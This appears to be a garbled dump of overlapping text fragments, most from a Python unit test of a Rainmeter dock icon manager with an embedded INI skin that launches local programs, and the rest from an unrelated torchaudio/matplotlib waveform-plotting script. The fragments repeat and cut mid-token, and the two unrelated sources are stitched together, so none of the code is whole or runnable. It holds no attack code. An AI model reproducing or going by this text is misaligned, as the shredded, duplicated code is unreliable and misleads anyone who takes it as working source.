[iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for", "assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie", "[Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added", "[movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria]", "editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video 
editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help]", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\"", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc", "unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------", "T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button", "Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version=", "program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for", "= [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons,", "assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video", "IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] 
IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R", "icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\",", "; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2]", "= \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata]", "junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow", "for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name, \"Incorrectly sorted icons\"", "[Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config=", "import icon_get import unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL>", "IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\"", "in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"]", "maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert", "License= Variant= Preview= ;End of added Metadata 
;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin", "IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\"", "junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\")", "2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow", "help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"]", "\"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name,", "help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker]", "image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow", "editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon", "[MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0", "[!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] 
IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video", "added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll", "= mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name,", "maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def", "for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R", "icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\",", "icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\")", "T = 
icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names", ";Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License=", "Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL", "[!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video", "Tags= License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower]", "help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names,", "Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty]", "mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name, \"Incorrectly", "\"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\")", "ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name == correct_name, \"Incorrectly sorted", "Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; 
MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll", "MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll", "maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button", "IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert", "T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\",", "[MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE", "correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons =", "Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT", "Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute", "ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" 
ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls", "ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R", "editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in", "; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video", "ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria", "of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin", ";----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL", 
"[\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class", "\"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in", "Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description=", "IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T", "Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull]", "editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"]" ]
[ "if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser()", "import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None):", "as F import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def", "default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input)", "# print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 =", "axes = plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for c", "# diff = waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 *", "ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input',", "range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim:", "# diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :]", "num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels,", "= diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1,", "sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output, title=\"\", xlim=[args.time1,", "num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes", "num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes =", "torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1:", "torch import 
torchaudio import torchaudio.functional as F import torchaudio.transforms as T import librosa", "<filename>tools/save_waveform.py import argparse import os import torch import torchaudio import torchaudio.functional as F", "axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__", "torchaudio.functional as F import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt", "plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1',", "plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames", "torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 #", "__name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5)", "F import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform,", "= torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels ==", "== '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2',", "parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1", "# waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape)", "def 
plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames =", "axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav')", "torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename,", "waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if", "sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 -", "parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1)", "c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}')", "import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform =", "parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] =", "linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim:", "plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for c in range(num_channels):", "if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__':", "= args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff", "{c+1}') if 
xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ ==", "'__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float,", "axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser =", "title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0,", "os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) #", "sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis", "axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim)", "1) if num_channels == 1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis,", "xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser", "= waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure,", "parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) #", "== 1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True)", "torchaudio import torchaudio.functional as F import torchaudio.transforms as T import librosa import matplotlib.pyplot", "xlim=None, ylim=None): waveform = 
waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames)", "plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape", "= [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels >", "import torchaudio import torchaudio.functional as F import torchaudio.transforms as T import librosa import", "= waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 *", "figure.suptitle(title) plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output',", "type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 =", "time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels", "if num_channels == 1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c],", "diff = waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1", "default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2,", "parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args()", "waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes", "= waveform.shape time_axis = torch.arange(0, num_frames) / sample_rate figure, axes = plt.subplots(num_channels, 1)", "if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: 
axes[c].set_ylim(ylim) figure.suptitle(title)", "os import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms as T", "filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis =", "axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels", "args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff =", "waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2", "diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1,", "as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform = waveform.numpy() num_channels,", "/ sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes =", "1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if", "= parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 =", "* sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output, title=\"\",", "torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5", "parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2)", "T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None,", "argparse import os import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms", "waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis = 
torch.arange(0, num_frames) / sample_rate", "import argparse import os import torch import torchaudio import torchaudio.functional as F import", "as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\",", "if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float,", "print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:,", "waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1", "parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args", "= torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) # diff =", "waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if", "default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES']", "num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False)", "plt.show(block=False) plt.savefig(filename) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png')", "in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if", "= argparse.ArgumentParser() 
parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu',", "default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args =", "args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1, sr1 = torchaudio.load(args.input) # waveform2, sr2", "for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel", "import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms as T import", "= plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for c in", "= torchaudio.load(args.input) # waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1", "import torchaudio.transforms as T import librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate,", "matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", 